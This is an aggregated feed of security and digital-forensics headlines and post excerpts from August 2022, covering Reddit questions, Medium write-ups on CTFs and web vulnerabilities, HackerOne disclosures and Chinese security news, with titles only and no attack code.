    Networking novice here, been messing around with Wireshark and noticed that some services, including Microsoft, call out to external servers using HTTP instead of HTTPS. I'm curious what advantages HTTP offers that would make someone eschew the increased security of HTTPS. It seems to me -- admittedly as someone joining the game in the 8th inning in terms of networking's history -- that unsecured protocols should be deprecated. Is there something I'm missing? submitted by /u/DataMoreLikeShplada [link] [comments]
    What would you do on your first day if you were the US Cyber Security Czar?
    What would you do on your first day as the US Cyber Security Czar and a budget in the billions of dollars? submitted by /u/greyyit [link] [comments]
  • Open

    How long should the Plaso ingest plugin from Autopsy take?
    (crossposted with r/digitalforensics) I'm running Autopsy 4.19.3 on Win10 Enterpise VM using the Plaso ingest plugin on a 40GB .e01 image taken from a 256GB drive. I ran all the other ingest plugins I intended to use beforehand, I closed the case, shutdown Autopsy and restarted before I started the plaso ingest. The VM is on ESXi 7, it has 16 cores (the host has 32), 128mb of RAM of which currently only 15GB is in use, the host has dual Xeon E5-2690 @ 2.90GHz. The ingest was started a week ago (2022/08/01 14:54 PDT) and the progress bar is still at 0%. log2timeline has been consistently maxing three cores the entire time and the file being worked on is changing when I click on the progress bar for it's status. So it's doing something. How long is this going to eventually take? Is there anything in the case or autopsy appdata folder that would give me more information? Is it possible run a plaso ingest with more than three log2timeline processes? submitted by /u/thenebular [link] [comments]
    Snapchat Forensics
    Does anyone have a good link to where I can find more information about the databases in Snapchat? I have some snaps under the path "Snapchat Gallery/snaps/xxxxxx/xxxxxx.decrypted_media". I would like to know/confirm if the Snapchat Gallery/snaps folder contains ONLY media taken with the phone (so not snaps received). Does anyone have any experience with this? submitted by /u/agente_99 [link] [comments]
    Note Taking Methodology
    Hey everyone! I'm curious what is everyone's notetaking methodology? I'm kind of scatterbrained and i tend to leave little notes everywhere when doing a case. So i'm wondering what are everyone else's methodology/tools? I'm currently using Obsidian for notes but i know there is a better way. I've used Aurora but i feel like there is something lacking but i'm not sure what. submitted by /u/shonen787 [link] [comments]
    Tips on finding a good mentor?
    Anyone have any recommendations as to where to find good mentors for blue teaming or DFIR? If not, can you share what made some of your mentors super valuable? Thanks! submitted by /u/tfulab23 [link] [comments]
    Question regarding which field to pick (Digital forensics V. eDiscovery)
    Hi, I am wondering what side of the field I should look into. I want to specifically do criminal investigation. Thank y’all, sorry for being bothersome. submitted by /u/swatteam23 [link] [comments]
    Question regarding how to learn how to use industry standard eDiscovery platforms, without being financiallly able to pay for training/tools.
    Hi all, I am going to college for CompEng, with a minor in DF&CompSec, I am wondering what tips you guys would have for learning how to utilize eDiscovery platforms to learn them, without much in the way of financial resources. (For example Encase, and other tools) If you guys have any trainings or resources I can use freely (without the CIA having to kill me lol) that would be appreciated. :) Thanks. submitted by /u/swatteam23 [link] [comments]
    Cellebrite advanced logical vs file system
    I’ve just started my journey into digital forensics and I’ve been finding it difficult to understand and research what the difference between Cellebrite’s “Advanced Logical” extraction and it’s “Full File System”. What are the capabilities and limitations of both types of extractions using Cellebrite? submitted by /u/holidaykid09 [link] [comments]
  • Open

    What do Russians think about the war? Telegram data
    Can what messages people heart-emoji or cry-emoji tell us anything about public sentiment about the war? Continue reading on Medium »
    RAAVN™ is a powerful application, designed specifically by analysts for analysts, that sifts…
    Continue reading on Medium »
  • Open

    GCHQ discovered significant vulnerability in Huawei equipment (2020)
    Article URL: https://news.sky.com/story/gchq-discovered-nationally-significant-vulnerability-in-huawei-equipment-12086688 Comments URL: https://news.ycombinator.com/item?id=32389632 Points: 13 # Comments: 0
  • Open

    zathura - SELinux confined
    submitted by /u/esp0x31 [link] [comments]
    Security Guide for Startups: How to think about security while moving quickly | LunaSec
    submitted by /u/breadchris [link] [comments]
    SimpleX Chat - the first messaging platform that has no user identifiers (not even random numbers) - v3.1 of iOS and Android apps released - with secret chat groups and server access via Tor.
    submitted by /u/epoberezkin [link] [comments]
    How do you secure your DNS in the cloud? - DNS in the Cloud Capabilities
    submitted by /u/MiguelHzBz [link] [comments]
    Targeted attack on industrial enterprises and public institutions [Kaspersky]
    submitted by /u/EspoJ [link] [comments]
    Codewarrior - open source SAST
    submitted by /u/CoolerVoid [link] [comments]
  • Open

    The Grant Bounty
    We are thrilled to introduce the Grant Bounty as part of our V2 initiative to invite all players of Web3 to get involved in security. The… Continue reading on Medium »
    Arab Cyber War Games NoSQL Challenge (Doctor X).
    In this CTF I developed a Nosql challenge that needs the penetration tester to Inject in many forms to find the flag. Continue reading on Medium »
    Exploit SQL Injection and bypass captcha with SQLMAP
    Kenzy challenge (Cyber wargames 2022) Continue reading on Medium »
    Solace Partners with Hats Finance to Sponsor Bug Bounties
    Solace, the decentralized insurance provider, is partnering with Hats Finance to sponsor bug bounties for Solace-insured DApps. This… Continue reading on Solace.Fi »
    Stored XSS using SVG file
    Hey guys, hope you all are doing well. I am Bharat Singh a Security Researcher and bug hunter from India. In this writeup I am going to… Continue reading on Medium »
    JWT Common Attacks
    What Is JWT 🤔? Continue reading on Medium »
    Stored XSS in app.gitbook.com
    Halo teman teman, Perkenalkan nama saya Mohammad Alfin Hidayatullah dan saya adalah seorang bug bounty hunter. Kali ini saya ingjn berbagi… Continue reading on Medium »
    From Shodan to RCE: That one time I hacked a Fortune 500 company.
    tl;dr: Continue reading on Medium »
    A simple JSON token opens an attack surface
    Or express-validator to the rescue! Continue reading on Geromics »
  • Open

    SecWiki News 2022-08-08 Review
    SecWiki周刊(第440期) by ourren CVE-2022-21999 by SecIN社区 VirusTotal 恶意软件滥用信任总结报告 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-08 Review
    SecWiki周刊(第440期) by ourren CVE-2022-21999 by SecIN社区 VirusTotal 恶意软件滥用信任总结报告 by Avenger 更多最新文章,请访问SecWiki
  • Open

    Arab Cyber War Games NoSQL Challenge (Doctor X).
    In this CTF I developed a Nosql challenge that needs the penetration tester to Inject in many forms to find the flag. Continue reading on Medium »
    Cyber wargames web challenges
    * * * Konan challenge * * * Continue reading on Medium »
    Exploit SQL Injection and bypass captcha with SQLMAP
    Kenzy challenge (Cyber wargames 2022) Continue reading on Medium »
  • Open

    Mainly Games, Music, SW and old flash
    http://home.darkok.xyz/ Was posted one year ago: give credit to the old publisher: https://www.reddit.com/user/JasonSec/ submitted by /u/Appropriate-You-6065 [link] [comments]
  • Open

    xmlrpc.php FILE IS enable it will used for Bruteforce attack and Denial of Service(DoS)
    Top Echelon Software disclosed a bug submitted by anonymmert12: https://hackerone.com/reports/1622867
    Lack of Rate limit while joining video call in talk section which is password protected
    Nextcloud disclosed a bug submitted by error2001: https://hackerone.com/reports/1596673 - Bounty: $250
  • Open

    Kubernetes Security
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection vulnerability in WHERE clause allowing…
    No content preview
  • Open

    Kubernetes Security
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection vulnerability in WHERE clause allowing…
    No content preview
  • Open

    Kubernetes Security
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection vulnerability in WHERE clause allowing…
    No content preview
  • Open

    FreeBuf早报 | 美国紧急警报系统发现严重缺陷;Gitlab 禁止使用Windows
    美国政府警告其紧急警报系统 (EAS) 系统中的严重漏洞;Gitlab 被发现有一项禁止使用 Microsoft Windows 的公司政策。
    安全应急响应,用魔法打败魔法!
    No content preview
    针对Windows和Linux ESXi服务器,GwisinLocker勒索软件发起勒索攻击
    GwisinLocker勒索软件系列针对具有Windows和Linux加密器的韩国医疗保健、工业和制药公司发动勒索攻击.
    微软365网络钓鱼攻击中滥用Snapchat和Amex网站
    攻击者在一系列网络钓鱼攻击中滥用 Snapchat 和美国运通网站上的开放重定向,以期窃取受害者 Microsoft 365 凭证。
    CVE-2022-21999 漏洞分析
    CVE-2022-21999(CVE-2022–22718)是微软2月周二补丁所爆出来的打印机本地提权漏洞。
    从BlackHat来看JDBC Attack
    从Mysql 任意文件读取、allowUrlInLocalInfile的使用、Mysql客户端反序列化等方面进行讲解。
    NHS遭网络攻击,系统出现重大故障
    英国国家卫生服务(NHS)的111紧急服务受到网络攻击,继而引发了重大影响,服务系统出现持续性中断。
    推特承认,零日漏洞致540万用户数据被盗
    推特正式确认攻击者在去年12 月使用的漏洞与他们在今年 1 月报告并修复的漏洞相同,并透露漏洞原因是去年6月的一次代码更新导致。

  • Open

    Blackbird: An OSINT tool to search for accounts by username
    submitted by /u/sanitybit [link] [comments]
    WinAPi Search - Recursively Search PE Binaries by Win32 Function Name
    submitted by /u/sanitybit [link] [comments]
    Technical analysis of syzkaller based fuzzers: It's not about VaultFuzzer!
    submitted by /u/hardenedvault [link] [comments]
  • Open

    SPY NEWS: 2022 — Week 31
    Summary of the espionage-related news stories for the Week 31 (31 July-6 August) of 2022. Continue reading on Medium »
    Казнь в Еленовке (анатомия провокации)
    Давайте попробуем проанализировать хронолигию событий, то что известно на данный момент, а потом делать выводы. Continue reading on Medium »
    CyberSoc CTF — Life Online — OSINT — wagthetail
    Cyber Detective CTF is an OSINT-focussed CTF created by the Cyber Society at Cardiff University. Continue reading on Medium »
    CyberSoc CTF — Life Online — OSINT — choochoo
    Cyber Detective CTF is an OSINT-focussed CTF created by the Cyber Society at Cardiff University. Continue reading on Medium »
    CyberSoc CTF — Life Online — OSINT — Growing Up
    Cyber Detective CTF is an OSINT-focussed CTF created by the Cyber Society at Cardiff University. Continue reading on Medium »
    CyberSoc CTF — Life Online — OSINT — VOTE FOR ME
    Cyber Detective CTF is an OSINT-focussed CTF created by the Cyber Society at Cardiff University. Continue reading on Medium »
    Top 10 most rated OSINT Tools on Github
    author — SATYAM PATHANIA Continue reading on Medium »
  • Open

    Getsimple CMS 3.3.10 Exploit
    Hallo kembali lagi dengan saya pada kesempatan kali ini saya ingin menunjukkan dokumentasi exploitasi Getsimple CMS 3.3.10. Continue reading on Medium »
    Introduction Session Hijacking
    Session hijacking is defined as taking over an active TCP/IP communication session without the user’s permission. When implemented… Continue reading on Medium »
    Practical XPath Injection : Attack and Defense Techniques
    Practical XPath Injection Exploits Continue reading on Medium »
    XXE Attack : Real life attacks and code examples
    XXE (XML External Entity Injection) is a web-based security vulnerability that enables an attacker to interfere with the processing of XML… Continue reading on Medium »
    Bug Bounty — What, How, Why?
    Getting started with bug bounties Continue reading on Medium »
    How To Write A Penetration Testing Report
    A Penetration testing report is the only tangible product. Continue reading on Medium »
    How I got a $10,000 Penetration Testing Project/Job with Bug Bounty
    Introduction: Continue reading on Medium »
    Everything you need to know about Cyber Security:
    Cybersecurity is the protection of Internet-connected systems such as hardware, software, and data from cyber threats. Individuals and… Continue reading on Medium »
    2FA Bypass via Google Identity & OAuth Login
    Hello All, Continue reading on Medium »
    CodeShield: Cloud Asset Inventory & Privilege Escalation Toolkit
    Hello everybody! In this blog post, we will go through a Cloud Security Tool, I recently came across: Codeshield. Continue reading on Medium »
  • Open

    Containers Vulnerability Scanner: Trivy
    This article talks about Trivy, which is a simple and comprehensive vulnerability scanner for containers and other artifacts, suitable for Continuous Integration and Testing. Table The post Containers Vulnerability Scanner: Trivy appeared first on Hacking Articles.
    Containers Vulnerability Scanner: Trivy
    This article talks about Trivy, which is a simple and comprehensive vulnerability scanner for containers and other artifacts, suitable for Continuous Integration and Testing. Table The post Containers Vulnerability Scanner: Trivy appeared first on Hacking Articles.
  • Open

    We always win
    [link] [comments]
  • Open

    open ports forensics
    hey there, if you get suspicious from attacker in your computer from download some "free" software, how can i see the history of open ports and traffic to another computer from the day i downloaded the software ? submitted by /u/ArticleUseful211 [link] [comments]
    Recovering emojis from Android Cellebrite extraction?
    Working with analysts on an Android mobile extraction. Emojis are coming up as question mark wingdings in SMS/MMS conversations. Analysts are telling me that there's no way to get that information from Android extractions, only iOS. This doesn't sound right to me. Is there advice I can give them regarding how retrieve the emoji data? submitted by /u/md9918 [link] [comments]
    What are some more CS - Research oriented jobs?
    This is a fascinating field to work into, even from an IT perspective (not looking down upon it, it just may get repetitive for some after a while), however we don't frequently see more high-end/research oriented roles being talked about in the sub. Apart from malware analysis/reverse engineering, what are some other opportunities to work for in the digital forensics field? Or what about jobs not necessarily pertaining to OS forensics? One example I have read about would be development of tools for media forensics. One in particular is about extracting ENF from videos/audio recordings to determine the location where it was captured. Sounds cool! In case you want to read more: https://arxiv.org/pdf/1912.09428.pdf https://arxiv.org/pdf/1903.09884.pdf https://en.wikipedia.org/wiki/Electrical_network_frequency_analysis Certainly this is an already niche field among CS but are the aforementioned roles even more niche to the extent that they exist only in academic context? submitted by /u/FF6B9EAD [link] [comments]
    GCFA - Study Tips
    I’m having a hard time studying RDP event IDs. Basically the entire IR part of Event IDs with different scenarios is giving me trouble. Any tips? How to best prepare for Book 2 of GCFA (Intrusion Analysis) submitted by /u/bigpoppaash [link] [comments]
  • Open

    ES File Explorer Open Port Vulnerability exploitation
    No content preview
    Enterprise: Active Directory Room From TryHackMe By Hashar Mujahid
    No content preview
    TryHackMe WriteUp: Agent T
    No content preview
    What is command injection and how to exploit it — StackZero
    No content preview
  • Open

    ES File Explorer Open Port Vulnerability exploitation
    No content preview
    Enterprise: Active Directory Room From TryHackMe By Hashar Mujahid
    No content preview
    TryHackMe WriteUp: Agent T
    No content preview
    What is command injection and how to exploit it — StackZero
    No content preview
  • Open

    ES File Explorer Open Port Vulnerability exploitation
    No content preview
    Enterprise: Active Directory Room From TryHackMe By Hashar Mujahid
    No content preview
    TryHackMe WriteUp: Agent T
    No content preview
    What is command injection and how to exploit it — StackZero
    No content preview
  • Open

    SecWiki News 2022-08-07 Review
    浅谈开源软件供应链风险 by ourren XSS in Gmail's Amp4Email by ourren [HTB] Europa Writeup by 0x584a 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-07 Review
    浅谈开源软件供应链风险 by ourren XSS in Gmail's Amp4Email by ourren [HTB] Europa Writeup by 0x584a 更多最新文章,请访问SecWiki
  • Open

    Hex? Imhex and Hexyl
    여러분들은 어떤 Hex editor/viewer를 사용하시나요? 저는 Linux를 메인으로 사용할 떈 Ghex와 hexdump, macOS에선 hexyl와 vim(+plug)을 주로 사용합니다. 오늘은 크로스 플랫폼을 지원하는 엄청난 Hex Editor인 ImHex에 대해 소개해드리려고 합니다. 저도 이제는 ImHex와 hexyl 조합으로 사용합니다 :D 제가 글 이력을 찾아보니 hexyl에 대해 소개한적이 없던 것 같아 오늘은 GUI 기반의 Hex editor인 ImHex와 CLI 기반의 Hex viewer인 hexyl에 대해 이야기할까 합니다. ImHex 🔍 A Hex Editor for Reverse Engineers, Programmers and people who value their retinas when working at 3 AM. ImHex의 소개입니다. 그냥 목적에 충실한 Hex Editor입니다. 그렇지만 이를 지원하는 강력한 기능들을 가지고 있습니다. 단순히 데이터를 보고, 편집하는 것 뿐만 아니라 패턴 기반으로 분석하거나 그래프 등으로 표현할 수 있습니다. 북마크 쪽도 굉장히 편리하구요. 그리고 분석을 위한 정말 많은 기능들을 지원합니다. 자세한건 아래 링크를 참고해주세요! https://github.com/WerWolv/ImHex#features 대다수 OS를 지원하고 있고, 최신 릴리즈에서 OS에 따라 맞춰서 다운로드하여 설치해주시면 됩니다. Hexyl Hexyl는 CLI 기반 Hex Viewer 입니다. Editing은 불가능하지만 단순히 보기 위해 사용하는 경우, 특히 CLI에서 작업을 진행중인 경우 Hexyl은 정말 좋은 선택지가 됩니다. ImHex와 유사하게 대다수 OS와 패키지 시스템을 지원합니다. 대표적으로는 아래와 같고, Release 페이지에서 다운로드 하거나 Installation 가이드 참고하셔서 설치하실 수 있습니다. # macOS brew install hexyl # ubuntu sudo apt install hexyl # alpine apt install hexyl References https://github.com/WerWolv/ImHex https://imhex.werwolv.net https://twitter.com/github/status/1554981700349960192...
  • Open

    UX Research Around Active Directory Security
    Hello everyone, I'm a User Experience Designer in a large security company that's currently building a product around identity security, including Active Directory and Azure AD. As I conduct my research, I try to determine how many domains an organization usually has (in varying scales, of course). How are they managed? Is there a team that manages specific domains across all forests? Does one team usually take care of all the domains and not care about the others? The purpose of this question is to understand if the user needs the option to toggle between domains rather than simply filtering data by "Domain Name". If you have any other comments regarding how you manage your domain security in your organization, it would be appreciated. Thank you very much! submitted by /u/RaspberryFair8362 [link] [comments]
  • Open

    Fuzzing in Go
    “Fuzz testing is a novel way to discover security vulnerabilities or bugs in software applications.” The concept of fuzzing was introduced… Continue reading on Better Programming »
  • Open

    Fuzzing in Go
    “Fuzz testing is a novel way to discover security vulnerabilities or bugs in software applications.” The concept of fuzzing was introduced… Continue reading on Better Programming »
  • Open

    Lots of free PDFs and other files on various subjects
    I found a link to someone's library on the internet. https://cdn.preterhuman.net/texts/ submitted by /u/ConstProgrammer [link] [comments]
    AC School
    submitted by /u/EGirlCollector [link] [comments]
  • Open

    Good one but severity of this kind of attack is very low.
    Continue reading on Medium »
  • Open

    HTTP PUT method is enabled downloader.ratelimited.me
    RATELIMITED disclosed a bug submitted by codeslayer137: https://hackerone.com/reports/545136
    Anonymous access control - Payments Status
    Omise disclosed a bug submitted by codeslayer137: https://hackerone.com/reports/1546726 - Bounty: $100
  • Open

    Phoenix Challenges -- Stack Zero
    Have been waiting for school to end for some time now to finally get back to exploit development. Finally got around to making my first exploit development writeup and wanted to share with the community. Looking forward to many more! https://secnate.github.io/ctf/phoenix/phoenix-stack-zero/?fbclid=IwAR1-XbyPP9rSrLArmTPqXNb1Tkfj_7E8_Qi3XFvaexEyZJPcuA1J_YeYkj8 Of course, any comments/feedback would be greatly appreciated! submitted by /u/ProgrammingBro123 [link] [comments]

  • Open

    Enterprise: Active Directory Room From TryHackMe
    You just landed in an internal network. You scan the network and there’s only the Domain Controller… Continue reading on InfoSec Write-ups »
    Php Object Injection Demo
    PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks… Continue reading on Medium »
    Web Application Reconnaissance Guide, Cybersec | Shubham Dhungana
    In this article, I’m going to document about the process to perform web application reconnaissance. Before reading this article, we must… Continue reading on Medium »
    PHP Object Injection
    A very common and critical vulnerability in PHP applications is PHP Object Injection. This blog post explains how they work and how they… Continue reading on Medium »
    Unsafe use of Reflection
    This vulnerability is caused by unsafe use of the reflection mechanisms in programming languages like Java or C# Continue reading on Medium »
    File Inclusion Demo
    This script is possibly vulnerable to file inclusion attacks. Continue reading on Medium »
    Code Injection
    Code Injection is the general term for attack types which consist of injecting code that is then interpreted/executed by the application… Continue reading on Medium »
    Bypassing File Type Filters
    Unrestricted File Upload — File Extension Filter Bypass Continue reading on Medium »
    Bypassing Directory Structure Filters
    Directory traversal (also known as file path traversal) is a web security vulnerability that allows an attacker to read arbitrary files on… Continue reading on Medium »
    Bypassing Filename Filters Demo
    One of the challenging factors to a Hacker in a web application attack is the file upload. The first step in every attack is to get some… Continue reading on Medium »
  • Open

    Windows Registry Standards?
    I'm using regshot to compare two registry snapshots against each other. Is there a standard for how to navigate around the potentially hundreds of registry changes that all look at the same to a beginner? submitted by /u/Jaruki_Jurakami [link] [comments]
    Which Wireshark book do you recommend?
    Hey there. I'm interested in learning Wireshark in my off-time from work, and I am trying to increase my time off screen, as I'm sure many of you stare at computers all day for work like me. So I'm looking for a physical book on Wireshark and packet analysis. There are a handful of well-reputed options on Amazon, but the budget's tight. Anyone read and would recommend any particular one of the well-known Wireshark books, like Wireshark 101 or Practical Packet Analysis? The reviews are all positive so it's tough to make a choice here. Many thanks. submitted by /u/DataMoreLikeShplada [link] [comments]
    Does HTTPS Basically Make Personal VPNs Useless for Security?
    Question says it all I'm currently going through my CCNP ENCOR, and covering IPSec in the Overlay Tunnels chapter IPSec typically has 2 modes: transport and tunnel Tunnel mode encrypts the ENTIRE packet, but requires dedicated endpoints - something that normies aren't going to have Transport mode encrypts only the payload (i.e. personal data), but keeps all the original header information (ports and IP addresses) However, HTTPS already encrypts the payload of network traffic. And a huge chunk of traffic hitting the internet (not just web traffic) is HTTP-based So would that not mean that - from a security perspective - personal (aka Transport) VPNs are basically useless? I understand the benefit of circumventing region locking for purposes of watching normally off-limits content (i.e. Netflix), but my question here is solely based on the security perspective Many thanks for any input submitted by /u/lfionxkshine [link] [comments]
  • Open

    Weekly quiz covering 10 interesting infosec stories or events from the past week
    submitted by /u/jaco_za [link] [comments]
    Kanye West's Stem Player - An engineering disaster
    submitted by /u/krystalgamer [link] [comments]
    nday exploit: libinput format string bug, canary leak exploit (cve-2022-1215)
    submitted by /u/Gallus [link] [comments]
  • Open

    RCE vulnerability in Hyperledger Fabric SDK for Java
    Hyperledger disclosed a bug submitted by freskimo: https://hackerone.com/reports/801370 - Bounty: $200
    Enrolling to a CA that returns an empty response crashes the node process
    Hyperledger disclosed a bug submitted by mttrbrts: https://hackerone.com/reports/506412 - Bounty: $500
    Brute Force of fabric-ca server admin account
    Hyperledger disclosed a bug submitted by xiaoc: https://hackerone.com/reports/411364 - Bounty: $1500
    cross site scripting in : mtn.bj
    MTN Group disclosed a bug submitted by alimanshester: https://hackerone.com/reports/1264834
    Ingress-nginx path allows retrieval of ingress-nginx serviceaccount token
    Kubernetes disclosed a bug submitted by gaffy: https://hackerone.com/reports/1382919 - Bounty: $2500
  • Open

    SecWiki News 2022-08-06 Review
    Kaggle知识点:时序预测基础知识 by ourren 安全控制有效性验证的发展趋势浅论 by ourren [HTB] Haircut Writeup by 0x584a 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-06 Review
    Kaggle知识点:时序预测基础知识 by ourren 安全控制有效性验证的发展趋势浅论 by ourren [HTB] Haircut Writeup by 0x584a 更多最新文章,请访问SecWiki
  • Open

    What is OSINT
    We have been trying to find someone online, specifically perhaps by using an email address, or username. Here the use of OSINT comes. Continue reading on Medium »
  • Open

    Smart contract security best practices: PART 1
    No content preview
    Post-Exploitation Basics In Active Directory Environment By Hashar Mujahid
    No content preview
    How i was able to get 29 free products. | Bug Bounty
    No content preview
    Another day, Another IDOR vulnerability— $5000 Reddit Bug Bounty
    Gaining unprivileged access to Reddit moderator logs Continue reading on InfoSec Write-ups »
  • Open

    Smart contract security best practices: PART 1
    No content preview
    Post-Exploitation Basics In Active Directory Environment By Hashar Mujahid
    No content preview
    How i was able to get 29 free products. | Bug Bounty
    No content preview
    Another day, Another IDOR vulnerability— $5000 Reddit Bug Bounty
    Gaining unprivileged access to Reddit moderator logs Continue reading on InfoSec Write-ups »
  • Open

    Smart contract security best practices: PART 1
    No content preview
    Post-Exploitation Basics In Active Directory Environment By Hashar Mujahid
    No content preview
    How i was able to get 29 free products. | Bug Bounty
    No content preview
    Another day, Another IDOR vulnerability— $5000 Reddit Bug Bounty
    Gaining unprivileged access to Reddit moderator logs Continue reading on InfoSec Write-ups »
  • Open

    Docker와 Dumb-Init
    오늘은 도커에서 안정적인 구동을 위해 사용하는 dumb-init과 pid1 그리고 init 시스템에 대한 이야기를 하려고 합니다. Init과 PID 1 Linux, macOS 등 대다수 OS에서 가장 첫번째 PID는 초기에 실행되는 Init 프로세스가 할당 받습니다. 그래서 ps 등으로 확인해보면 init 관련 프로세스가 PID 1을 가지고 있는 경우가 많습니다. 그리고 Init 프로세스는 Unix 기반 운영 체제에서 부팅 시 최초의 프로세스가 되는 데몬으로 PID 1번이기 때문에 모든 프로세스의 직/간접적인 부모 프로세스가 됩니다. 이는 Init의 역할인 고아(Orphaned) 프로세스를 입양하기 때문이죠. 그러나 도커의 경량 컨테이너들의 경우 systemd, sysvinit 등의 init 시스템이 없기 때문에 ENTRYPOINT에 명시한 명령어, 즉 사용자가 만든 어플리케이션이나 쉘 스크립트가 PID 1번을 받습니다. ENTRYPOINT ["/app/run.sh"] # this is pid 1 Problem 그럼 일반 어플리케이션이 PID 1을 가질 떈 어떤 문제가 발생할까요? Signal 일반 어플리케이션이나 스크립트가 PID 1을 받으면 원래 목적이 프로세스를 관리하는 어플리케이션이 아니기 떄문에 정상적으로 시그널 처리를 할 수 없을 가능성이 있습니다. 만약 앱 실행을 위해 ENTRYPOINT에 /app/run.sh 가 지정된 경우 해당 쉘 스크립트가 PID 1을 가져가게 되고, 해당 스크립트로 실행된 어플리케이션이 하위 PID를 받게 됩니다. .host(node) └── [PID 1] /app/run.sh └── [PID 2] /app/server --bind 8080 이런 경우 쉘 스크립트가 시그널을 처리할 수 없기 때문에 정상적으로 시그널 처리를 하지 못합니다. 또한 사용자 어플리케이션의 경우도 아래 예시와 같이 별도로 Signal 핸들러를 구성한게 아니라면 처리하지...
  • Open

    Drop your favorite resource for exploit dev
    I want to start learning exploit dev, if you guys can help me with it or drop in your favorite resource that helped you get where you are, it would be great! If someone has time and would like to answer a few questions, it would help me a lot too. submitted by /u/National_Concern2361 [link] [comments]
  • Open

    Pocsuite3: An open-sourced remote vulnerability testing framework
    Article URL: https://github.com/knownsec/pocsuite3 Comments URL: https://news.ycombinator.com/item?id=32365622 Points: 1 # Comments: 0
  • Open

    常用的30+种未授权访问漏洞汇总
    覆盖了目前网络资讯上公布的30+种常见的未授权访问漏洞
  • Open

    game images
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    The Mysterious Container net.core.somaxconn (2022)
    TL; DR Try to answer several quick questions with a long post: On creating a pod in Kubernetes, if somaxconn is not specified, what the default value will be, and who will set it? If changing node’s sysctl settings, will they be propagated to pods? Are all sysctl parameters are equal in terms of initialization and propagation? TL; DR 1 Background 1.1 Journey of components when creating a pod 1.2 sysctls in container and unsafe sysctls in k8s 1.3 The net.core.somaxconn parameter of pods/containers 1.4 Problem statement 2 Dig inside 2.1 kube-apiserver -> kubelet 2.2 kubelet -> dockerd 2.3 Skip k8s/kubelet/cni: create container right from docker 2.4 Skip docker: create container right from containerd Find the right containerd.sock file Pull image Create a container Check the …
    The Mythical Container net.core.somaxconn (2022)
    TL; DR Try to answer several quick questions with a long post: On creating a pod in Kubernetes, if somaxconn is not specified, what the default value will be, and who will set it? If changing node’s sysctl settings, will they be propagated to pods? Are all sysctl parameters are equal in terms of initialization and propagation? TL; DR 1 Background 1.1 Journey of components when creating a pod 1.2 sysctls in container and unsafe sysctls in k8s 1.3 The net.core.somaxconn parameter of pods/containers 1.4 Problem statement 2 Dig inside 2.1 kube-apiserver -> kubelet 2.2 kubelet -> dockerd 2.3 Skip k8s/kubelet/cni: create container right from docker 2.4 Skip docker: create container right from containerd Find the right containerd.sock file Pull image Create a container Check the …

  • Open

    Process Injection
    Whenever we’ll get a reverse shell, it’s mostly is spawned by creating a new separate process, if that process gets killed, could be… Continue reading on Medium »
  • Open

    Automate SQLiDetector Hacking Tool
    completely automate SQLI-Injection detector hacking tool Continue reading on Medium »
    Hacking a company from a phone
    This story is a tale from my job around being able to fully compromise a server whilst only having my phone accessible to me. Continue reading on Medium »
    Irremovable guest in facebook event — Facebook bug bounty
    Hello Everyone, This is Rajiv Gyawali from Butwal, Nepal. This is a story of one of my finding on facebook. Continue reading on Medium »
    Orderby Limit Sql
    Introduction to SQL Limit Order By The limit clause in Mysql is used to restrict the number of the rows retrieved in the resultset of the… Continue reading on Medium »
    Web Security Academy — OS command injection, simple case
    This challenge is from the Web Security Academy by Portswigger. It is under the category “OS command injection”. After starting the lab… Continue reading on Medium »
    Bypassing Blacklists CTF In Kali Linux
    Continue reading on Medium »
    Automated Tools Sql NINJA
    sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking… Continue reading on Medium »
    Error Based Sql Injection
    What Is Error-Based SQL Injection? Continue reading on Medium »
    Double Blind Sql Injection
    SQL Injection vulnerabilities are often detected by analyzing error messages received from the database, but sometimes we cannot exploit… Continue reading on Medium »
    How Blind SQL Injection Works
    Blind SQL injection is a type of SQL injection attack where the attacker indirectly discovers information by analyzing server reactions to… Continue reading on Medium »
  • Open

    Fix : (Security) Mitigate Path Traversal Bug
    Hyperledger disclosed a bug submitted by bhaskar_ram: https://hackerone.com/reports/1635321 - Bounty: $200
  • Open

    Chrome 105 Beta: Custom Highlighting, Fetch Upload Streaming, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 105 is beta as of DATE. You can download the latest on Google.com for desktop or on Google Play Store on Android. Custom Highlight API The Custom Highlight API extends the concept of highlighting pseudo-elements by providing a way to style the text of arbitrary ranges, rather than being limited to the user agent-defined ::selection, ::inactive-selection, ::spelling-error, and ::grammar-error. This is useful in a variety of scenarios, including editing frameworks that wish to implement their own selection, find-in-page over virtuali…
  • Open

    How Passwordless Works
    Passwordless is a form of authentication that doesn't require users to provide passwords during login. That much you could glimpse from the name, but how does it work? What are its trade-offs? This blog post will do its best to explain to you how passwordless can be implemented using modern technologies such as Web Authentication (WebAuthn), while at the same time providing better user experience and security than the traditional password-based approach. submitted by /u/Blakebvhjjdd [link] [comments]
    Repository of Adversarial Tactics That is Updated Daily
    submitted by /u/entropydaemon8 [link] [comments]
    New Era of Phishing Payloads After The Deprecation of Macros
    submitted by /u/sciencestudent99 [link] [comments]
    Reverse Engineering Windows Printer Drivers (Part 1)
    submitted by /u/sanitybit [link] [comments]
    Exploiting a Linux kernel Use-After-Free in io_uring
    submitted by /u/awarau888 [link] [comments]
    A journey into IoT - Unknown Chinese alarm - Part 3 - Radio communications
    submitted by /u/0xdea [link] [comments]
    Abusing container mount points and symlinks on MikroTik's RouterOS to gain code execution
    submitted by /u/crower [link] [comments]
    fwd:cloudsec 2022 Conference Talk Recordings
    submitted by /u/sanitybit [link] [comments]
  • Open

    Why do you do Exploit Dev?
